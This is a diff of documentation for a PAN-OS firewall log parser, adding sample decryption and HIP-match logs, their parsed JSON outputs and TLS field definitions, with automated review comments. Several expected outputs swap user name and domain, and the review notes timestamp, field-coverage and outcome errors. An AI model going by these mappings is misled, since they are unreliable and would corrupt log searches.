rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:39:51Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "start" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "logger": "decryption" + }, + 
"network": { + "application": "incomplete" + }, + "observer": { + "egress": { + "interface": { + "alias": "INTERNET" + } + }, + "ingress": { + "interface": { + "alias": "VPN-SSL" + } + }, + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "Threat_ContentType": "start", + "VirtualLocation": "vsys1", + "tls": { + "chain_status": "Trusted", + "root_status": "trusted", + "sni": "static.files.example.org" + } + }, + "related": { + "hash": [ + "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + ], + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "example", + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile", + "uuid": "eaf45b26-01ef-496c-990d-bbd1d89f2ed5" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 1042 + }, + "port": 58877, + "user": { + "domain": "example", + "name": "jdoe" + } + }, + "tls": { + "curve": "secp256r1", + "server": { + "hash": { + "sha256": "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + }, + "x509": { + "issuer": { + "common_name": "GlobalSign ECC OV SSL CA 2018" + } + } + }, + "version": "1.2" + }, + "user": { + "domain": "jdoe", + "name": "example" + } + } + + ``` + + === "test_dhcp_renew_json.json" ```json @@ -1895,6 +2111,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "type": "0" }, "host": { + "id": "662f0b44-e024-4a70", "name": "2023-01724", "os": { "version": "Microsoft Windows 10 Enterprise , 64-bit" @@ -1923,7 +2140,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I "1.2.3.4" ], "user": [ - "JDOE" + "JDOE", + "test.fr" ] }, "source": { @@ -1938,8 +2156,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I } }, "user": { - "domain": "test.fr", - "name": "JDOE" + "domain": "JDOE", + "name": "test.fr" }, "user_agent": { "os": { 
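Review bot: The `@timestamp` of the `test_decryption_csv.json` sample, `2024-11-03T19:09:43Z`, is taken from the zone-less generated-time column even though the same record carries `2024-11-03T19:09:43.654+01:00`, which places the event at 18:09:43Z; the `test_hipmatch_csv.json` sample in the next hunk does use the offset-bearing column (`17:50:04.310000Z`), so decryption and HIP-match events from the same deployment would sit an hour apart on a timeline. The field table added further down declares `tls.cipher`, `tls.server.x509.serial_number` and `tls.server.x509.subject.common_name`, but neither sample populates them although the raw records contain `TLSKeyExchange`/`TLSEncryptionAlgorithm`/`TLSAuth`, `CertificateSerial` and `CommonName`, so either the samples or the table is out of date. In the JSON sample, `ErrorMessage` (`General TLS protocol error. Received fatal alert DecodeError from server`) is dropped while `event.outcome` is `success`, which appears to hide a failed handshake from anyone filtering on outcome; carrying it as `event.reason` would keep that signal. The inverted `user.domain`/`user.name` in the JSON sample is covered by the note on the earlier hunk.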
@@ -1952,6 +2170,149 @@ This section demonstrates how the raw logs will be transformed by our parsers. I ``` +=== "test_hipmatch_csv.json" + + ```json + + { + "message": "1,2024/11/03 18:50:04,026701003578,HIPMATCH,0,2817,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,\n", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T17:50:04.310000Z", + "action": { + "type": "0" + }, + "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-CIV1", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-CIV1", + "product": "PAN-OS", + "serial_number": "026701003578" + }, + "paloalto": { + "DGHierarchyLevel1": "28", + "DGHierarchyLevel2": "99", + "DGHierarchyLevel3": "38", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "VPN Compliant" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe" + } + }, + "user": { + "name": "jdoe" + } + } + + ``` + + +=== "test_hipmatch_json.json" + + ```json + + { + "message": "{\"TimeReceived\":\"2024-11-20T16:30:32.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"HIPMATCH\",\"Subtype\":\"hipmatch\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:30:28.000000Z\",\"SourceUser\":\"jdoe@example.org\",\"VirtualLocation\":\"vsys1\",\"EndpointDeviceName\":\"DESKTOP-01\",\"EndpointOSType\":\"Windows\",\"SourceIP\":\"1.2.3.4\",\"HipMatchName\":\"VPN 
Compliant\",\"RepeatCount\":1,\"CountOfRepeats\":1,\"HipMatchType\":\"profile\",\"SequenceNo\":1111111111111111111,\"DGHierarchyLevel1\":12,\"DGHierarchyLevel2\":22,\"DGHierarchyLevel3\":0,\"DGHierarchyLevel4\":0,\"VirtualSystemName\":\"\",\"DeviceName\":\"FW-ALK01\",\"VirtualSystemID\":1,\"SourceIPv6\":\"\",\"HostID\":\"3a7393a4-997f-4e5b-b6e4-4ebff71dacf4\",\"EndpointSerialNumber\":\"aefee8\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceMac\":null,\"SourceDeviceHost\":null,\"Source\":null,\"TimestampDeviceIdentification\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:30:28.904000Z\"}\n", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:30:28Z", + "action": { + "type": "hipmatch" + }, + "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-ALK01", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-ALK01", + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "DGHierarchyLevel1": "12", + "DGHierarchyLevel2": "22", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "hipmatch", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "example.org", + "jdoe@example.org" + ] + }, + "rule": { + "name": "VPN Compliant" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe@example.org" + } + }, + "user": { + "domain": "jdoe", + "email": "jdoe@example.org", + "name": "example.org" + } + } + + ``` + + === "test_installed_package_json.json" ```json 
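Review bot: In the `test_hipmatch_json.json` expected output, `related.user` lists `example.org` and `jdoe@example.org` while the CSV variant of the same log type lists `jdoe`, so one account is indexed under different keys depending on the log format and a pivot on `related.user: jdoe` misses the JSON events. Splitting `SourceUser` at `@` into `user.name: jdoe` and `user.domain: example.org` (keeping `user.email`) and adding the bare login to `related.user` would align the two formats; the domain/name orientation itself is discussed on the earlier hunk. The same split should feed `source.user.name`, which currently holds the full address here but the bare login in the CSV sample.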
@@ -2214,6 +2575,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I
 "type": "globalprotect"
 },
 "host": {
+ "id": "e4f14dfd-bd3c-40e5-9c4e",
 "name": "LNL-test"
 },
 "log": {
@@ -3831,7 +4193,7 @@ This section demonstrates how the raw logs will be transformed by our parsers. I
 "1.2.3.4"
 ],
 "user": [
- "JDOE"
+ "test.fr"
 ]
 },
 "source": {
@@ -3840,8 +4202,8 @@ This section demonstrates how the raw logs will be transformed by our parsers. I
 "port": 0
 },
 "user": {
- "domain": "test.fr",
- "name": "JDOE"
+ "domain": "JDOE",
+ "name": "test.fr"
 }
 }
@@ -5281,6 +5643,9 @@ The following table lists the fields that are extracted, normalized under the EC
 |`paloalto.threat.category` | `keyword` | Threat Category |
 |`paloalto.threat.id` | `keyword` | The identifier of the threat |
 |`paloalto.threat.name` | `keyword` | The name of the threat |
+|`paloalto.tls.chain_status` | `keyword` | The trust in the TLS chain |
+|`paloalto.tls.root_status` | `keyword` | The trust in the root certificate |
+|`paloalto.tls.sni` | `keyword` | The server name indication |
 |`rule.name` | `keyword` | Rule name |
 |`rule.uuid` | `keyword` | Rule UUID |
 |`source.bytes` | `long` | Bytes sent from the source to the destination. |
@@ -5292,6 +5657,13 @@ The following table lists the fields that are extracted, normalized under the EC
 |`source.port` | `long` | Port of the source. |
 |`source.user.domain` | `keyword` | Name of the directory the user is a member of. |
 |`source.user.name` | `keyword` | Short name or login of the user. |
+|`tls.cipher` | `keyword` | String indicating the cipher used during the current connection. |
+|`tls.curve` | `keyword` | String indicating the curve used for the given cipher, when applicable. |
+|`tls.server.hash.sha256` | `keyword` | Certificate fingerprint using the SHA256 digest of DER-encoded version of certificate offered by the server. |
+|`tls.server.x509.issuer.common_name` | `keyword` | List of common name (CN) of issuing certificate authority. |
+|`tls.server.x509.serial_number` | `keyword` | Unique serial number issued by the certificate authority. |
+|`tls.server.x509.subject.common_name` | `keyword` | List of common names (CN) of subject. |
+|`tls.version` | `keyword` | Numeric part of the version parsed from the original string. |
 |`url.domain` | `keyword` | Domain of the url. |
 |`url.original` | `wildcard` | Unmodified original url as seen in the event source. |
 |`url.path` | `wildcard` | Path of the request, such as "/search". |
diff --git a/_shared_content/operations_center/integrations/generated/ea265b9d-fb48-4e92-9c26-dcfbf937b630_sample.md b/_shared_content/operations_center/integrations/generated/ea265b9d-fb48-4e92-9c26-dcfbf937b630_sample.md
index 4ca1bda5f..0b52e6a73 100644
--- a/_shared_content/operations_center/integrations/generated/ea265b9d-fb48-4e92-9c26-dcfbf937b630_sample.md
+++ b/_shared_content/operations_center/integrations/generated/ea265b9d-fb48-4e92-9c26-dcfbf937b630_sample.md
@@ -382,6 +382,114 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_decryption_csv" + + + ```json + 1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use",,ssl,no,no + + ``` + + + +=== "test_decryption_json" + + + ```json + { + "TimeReceived": "2024-11-20T16:40:01.000000Z", + "DeviceSN": "no-serial", + "LogType": "DECRYPTION", + "Subtype": "start", + "SubType": "start", + "ConfigVersion": "10.2", + "TimeGenerated": "2024-11-20T16:39:51.000000Z", + "SourceAddress": "1.2.3.4", + "DestinationAddress": "5.6.7.8", + "NATSource": "4.3.2.1", + "NATDestination": "8.7.6.5", + "Rule": "URL Filtering - Chrome Profile", + "SourceUser": "example\\jdoe", + "DestinationUser": null, + "Application": "incomplete", + "VirtualLocation": "vsys1", + "FromZone": "VPN-SSL", + "ToZone": "INTERNET", + "InboundInterface": "tunnel.16", + "OutboundInterface": "ethernet1/1", + "LogSetting": "Forward-Syslog", + "TimeReceivedManagementPlane": "2024-11-20T16:39:51.000000Z", + "SessionID": 2222222, + "RepeatCount": 1, + "CountOfRepeat": 1, + "SourcePort": 58877, + "DestinationPort": 443, + "NATSourcePort": 1042, + "NATDestinationPort": 443, + "Protocol": "tcp", + "Action": "allow", + "Tunnel": "N/A", + "SourceUUID": null, + "DestinationUUID": null, + "RuleUUID": "eaf45b26-01ef-496c-990d-bbd1d89f2ed5", + 
"ClientToFirewall": "Finished", + "FirewallToClient": "Client_Hello", + "TLSVersion": "TLS1.2", + "TLSKeyExchange": "ECDHE", + "TLSEncryptionAlgorithm": "AES_256_GCM", + "TLSAuth": "SHA384", + "PolicyName": "TLS - https inspection - default rule", + "EllipticCurve": "secp256r1", + "ErrorIndex": "Protocol", + "RootStatus": "trusted", + "ChainStatus": "Trusted", + "ProxyType": "Forward", + "CertificateSerial": "059125d73c34a73fca9", + "Fingerprint": "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b", + "TimeNotBefore": 1730875569, + "TimeNotAfter": 1765176368, + "CertificateVersion": "V3", + "CertificateSize": 256, + "CommonNameLength": 13, + "IssuerNameLength": 29, + "RootCNLength": 10, + "SNILength": 23, + "CertificateFlags": 4, + "CommonName": "example.org", + "IssuerCommonName": "GlobalSign ECC OV SSL CA 2018", + "RootCommonName": "GlobalSign", + "ServerNameIndication": "static.files.example.org", + "ErrorMessage": "General TLS protocol error. Received fatal alert DecodeError from server", + "ContainerID": null, + "ContainerNameSpace": null, + "ContainerName": null, + "SourceEDL": null, + "DestinationEDL": null, + "SourceDynamicAddressGroup": null, + "DestinationDynamicAddressGroup": null, + "TimeGeneratedHighResolution": "2024-11-20T16:39:51.441000Z", + "SourceDeviceCategory": null, + "SourceDeviceProfile": null, + "SourceDeviceModel": null, + "SourceDeviceVendor": null, + "SourceDeviceOSFamily": null, + "SourceDeviceOSVersion": null, + "SourceDeviceHost": null, + "SourceDeviceMac": null, + "DestinationDeviceCategory": null, + "DestinationDeviceProfile": null, + "DestinationDeviceModel": null, + "DestinationDeviceVendor": null, + "DestinationDeviceOSFamily": null, + "DestinationDeviceOSVersion": null, + "DestinationDeviceHost": null, + "DestinationDeviceMac": null, + "SequenceNo": 1111111111111111111 + } + ``` + + + === "test_dhcp_renew_json" 
@@ -582,6 +690,63 @@ In this section, you will find examples of raw logs as generated natively by the +=== "test_hipmatch_csv" + + + ```json + 1,2024/11/03 18:50:04,026701003578,HIPMATCH,0,2817,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00, + + ``` + + + +=== "test_hipmatch_json" + + + ```json + { + "TimeReceived": "2024-11-20T16:30:32.000000Z", + "DeviceSN": "no-serial", + "LogType": "HIPMATCH", + "Subtype": "hipmatch", + "ConfigVersion": "10.2", + "TimeGenerated": "2024-11-20T16:30:28.000000Z", + "SourceUser": "jdoe@example.org", + "VirtualLocation": "vsys1", + "EndpointDeviceName": "DESKTOP-01", + "EndpointOSType": "Windows", + "SourceIP": "1.2.3.4", + "HipMatchName": "VPN Compliant", + "RepeatCount": 1, + "CountOfRepeats": 1, + "HipMatchType": "profile", + "SequenceNo": 1111111111111111111, + "DGHierarchyLevel1": 12, + "DGHierarchyLevel2": 22, + "DGHierarchyLevel3": 0, + "DGHierarchyLevel4": 0, + "VirtualSystemName": "", + "DeviceName": "FW-ALK01", + "VirtualSystemID": 1, + "SourceIPv6": "", + "HostID": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", + "EndpointSerialNumber": "aefee8", + "SourceDeviceCategory": null, + "SourceDeviceProfile": null, + "SourceDeviceModel": null, + "SourceDeviceVendor": null, + "SourceDeviceOSFamily": null, + "SourceDeviceOSVersion": null, + "SourceDeviceMac": null, + "SourceDeviceHost": null, + "Source": null, + "TimestampDeviceIdentification": null, + "TimeGeneratedHighResolution": "2024-11-20T16:30:28.904000Z" + } + ``` + + + === "test_installed_package_json"